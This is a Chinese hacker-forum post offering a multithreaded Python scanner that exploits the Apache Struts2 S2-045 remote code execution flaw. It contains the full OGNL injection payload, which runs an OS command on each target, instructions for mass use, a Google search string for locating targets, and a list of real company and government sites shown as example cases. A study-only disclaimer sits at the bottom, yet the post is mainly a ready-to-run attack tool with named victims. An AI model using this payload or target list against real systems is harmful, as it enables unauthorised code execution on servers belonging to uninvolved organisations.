st2-045多线程批量验证poc附案例 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

st2-045多线程批量验证poc附案例

无法 漏洞预警
import requests

import Queue

import threading

import sys





def poc():

    headers={

        "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36",

        "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo Wsbug').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

    }

    while not Q.empty():

        url=Q.get()

        try:

            xy = requests.get(url=url,headers=headers,timeout=5).text

            if 'Wsbug' in xy:

                print url

                with open('OK.txt','a+') as f2:

                     f2.write(url+'\n')

        except:

            pass





if __name__ == '__main__':

    Q = Queue.Queue()

    with open(sys.argv[1]) as f:

        for i in f:

            Q.put(i)

    for i in xrange(20):

        x=threading.Thread(target=poc)

        x.start()





使用方法:
本帖隐藏的内容
st2.py x.txt



如:
本帖隐藏的内容
st2.py url.txt



谷歌关键字:
本帖隐藏的内容
filetype:action(仅限于谷歌,百度不行)



一些案例:
本帖隐藏的内容
http://www.artemide.it/privacy.action

http://www.artemide.com/note.action

https://www.centrepompidou.fr/cpv/agenda.action

http://www.seabourn.com/legalAndPrivacy/Main.action

http://peacekeeper.futuremark.com/faq.action

https://www.hollandamerica.com/legalAndPrivacy/Main.action

https://www.lendingclub.com/browse/browse.action

https://www.cargurus.com/Cars/instantMarketValue.action

https://www.eastdane.com/actions/giftCertificatePageAction.action

http://quotes.esignal.com/esignalprod/search.action

http://www.adnrd.ae/home.action?lang=2

https://doda.jp/DodaFront/View/NewJobList.action

http://www.bitpipe.com/data/loadAsset.action?resId=1205174469_52

http://www.nature.com/ecommerce/subscribe.action?productId=NPHYS

http://www.meteogalicia.gal/web/ ... lidadesIndex.action

http://www.shopmoroso.com/eb/welcome.action

http://bitpipe.computerweekly.co ... esId=1442813582_705

https://www.gpo.gov/fdsys/browse ... ?collectionCode=CRI 
标签: Struts2

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表

    小赢哥  沙发 发表于2017-04-07 16:34 @回复
    1